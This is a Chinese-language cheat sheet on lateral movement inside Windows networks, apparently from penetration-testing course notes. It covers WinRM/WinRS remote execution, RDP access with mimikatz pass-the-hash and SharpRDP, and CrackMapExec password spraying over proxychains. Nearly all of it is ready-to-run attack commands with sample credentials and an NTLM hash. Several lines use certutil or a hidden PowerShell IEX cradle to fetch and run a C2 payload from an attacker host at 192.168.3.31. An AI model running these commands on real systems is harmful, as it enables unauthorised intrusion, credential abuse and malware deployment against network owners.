内网对抗-横向移动篇&WinRS命令&WinRM管理&RDP终端&密码喷射点&CrackMapExec
➢ 横向移动-WinRS&WinRM&RDP
➢ 横向移动-密码喷射-CrackMapExec
#WinRM&WinRS
WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。WinRS是内置的命令行工具,用于远程连接运行WinRM的服务器并执行大多数cmd命令
参考:https://cloud.tencent.com/developer/article/1802241
利用条件:
1、win 2012之前利用需要手动开启winRM ,在win 2012之后(包括win 2012)的版本是默认开启的,
2、防火墙对5986、5985端口开放。
开启命令:
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}
1.探针可用:
端口扫描5985
2.连接执行:通过winrs来执行远程命令
winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami
3.上线C2:
winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"
4.CS内置:
winrm winrm64
5.其他解决:通过winrm.cmd来进行命令执行
shell winrm invoke Create wmicimv2/win32_process @{CommandLine="cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"} -r:sqlserver -u:sqlserver\administrator -p:admin!@#45
#RDP
远程桌面服务 支持明文及HASH连接
条件:对方开启RDP服务 远程桌面
1.探针连接::
端口扫描3389
tasklist /svc | find "TermService" # 找到对应服务进程的PID
netstat -ano | find "PID值" # 找到进程对应的端口号
2.连接执行:
明文连接:适用于Socks代理后
mstsc /console /v:192.168.3.32 /admin
mimikatz(HASH连接)
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"
SharpRDP(明文连接)
https://github.com/0xthirteen/SharpRDP
是一款可以不借助远程桌面GUI的情况下,通过RDP协议进行命令执行的程序。
SharpRDP.exe computername=192.168.3.32 command="powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.3.31:83/a'))\"" username=Administrator password=admin!@#45
#CrackMapExec-密码喷射
Github:https://github.com/Porchetta-Industries/CrackMapExec
官方手册:https://www.crackmapexec.wiki/
使用案例:https://www.cnblogs.com/Yang34/p/14411497.html
下载对应release,建立socks连接,设置socks代理,配置规则,调用!
1、Linux Proxychains使用
代理配置:Proxychains.conf
代理调用:Proxychains 命令
2、密码喷射-域用户登录PTH:
主要参数:-u用户,-p密码,-H哈希值,-d指定域,-x执行命令
主要功能:多协议探针,字典设置,本地及域喷射,命令回显执行等
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c #域用户HASH登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth #本地用户明文登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth -x "whoami" #本地用户明文登录并执行命令
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth #本地用户HASH登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p pass.txt --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c --local-auth --users
